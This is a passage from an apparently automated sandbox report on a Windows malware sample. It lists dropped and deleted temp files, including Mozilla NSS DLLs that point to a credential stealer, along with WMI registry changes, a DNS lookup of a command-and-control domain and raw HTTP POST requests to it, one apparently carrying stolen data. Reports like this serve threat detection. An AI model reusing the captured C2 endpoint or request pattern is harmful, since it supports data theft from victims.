  742. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  743. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  744. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  745. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  746. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  747. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  748. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  749. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  750. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  751. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  752. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  753. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  754. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  755. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  756. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  757. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  758. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  759. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  760. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  761. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  762. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  763. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  764. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  765. "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp",
  766. "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp",
  767. "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp",
  768. "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp",
  769. "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp",
  770. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
  771. "\\??\\WMIDataDevice",
  772. "\\??\\PIPE\\samr",
  773. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  774. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  775. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  776. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  777. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  778. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  779. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  780. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER"
  781.  
  782.  
  783. * Deleted Files:
  784. "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp",
  785. "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp",
  786. "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp",
  787. "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp",
  788. "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp",
  789. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
  790. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  791. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  792. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  793. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  794. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  795. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  796. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  797. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  798. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  799. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  800. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  801. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  802. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  803. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  804. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  805. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  806. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  807. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  808. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  809. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  810. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  811. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  812. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  813. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  814. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  815. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  816. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  817. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  818. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  819. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  820. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  821. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  822. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  823. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  824. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  825. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  826. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  827. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  828. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  829. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  830. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  831. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  832. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  833. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  834. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  835. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  836. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  837. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  838. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
  839. "C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe"
  840.  
  841.  
  842. * Modified Registry Keys:
  843. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
  844. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  845. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
  846. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  847. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  848. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  849. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  850. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  851. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  852. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  853. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  854. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  855. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  856. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
  857.  
  858.  
  859. * Deleted Registry Keys:
  860.  
  861. * DNS Communications:
  862.  
  863. "type": "A",
  864. "request": "absetup8.icu",
  865. "answers":
  866.  
  867. "data": "47.252.1.254",
  868. "type": "A"
  869.  
  870.  
  871.  
  872.  
  873.  
  874. * Domains:
  875.  
  876. "ip": "47.252.1.254",
  877. "domain": "absetup8.icu"
  878.  
  879.  
  880.  
  881. * Network Communication - ICMP:
  882.  
  883. * Network Communication - HTTP:
  884.  
  885. "count": 1,
  886. "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  887. "uri": "http://absetup8.icu/index.php",
  888. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  889. "method": "POST",
  890. "host": "absetup8.icu",
  891. "version": "1.1",
  892. "path": "/index.php",
  893. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: absetup8.icu\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  894. "port": 80
  895.  
  896.  
  897. "count": 1,
  898. "body": "",
  899. "uri": "http://absetup8.icu/index.php",
  900. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  901. "method": "POST",
  902. "host": "absetup8.icu",
  903. "version": "1.1",
  904. "path": "/index.php",
  905. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: absetup8.icu\r\nContent-Length: 66393\r\nCache-Control: no-cache\r\n\r\n",
  906. "port": 80
  907.  
  908.  
  909.  
  910. * Network Communication - SMTP:
  911.  
  912. * Network Communication - Hosts:
  913.  
  914. "country_name": "United States",
  915. "ip": "47.252.1.254",
  916. "inaddrarpa": "",
  917. "hostname": "absetup8.icu"
  918.  
  919.  
  920.  
  921. * Network Communication - IRC: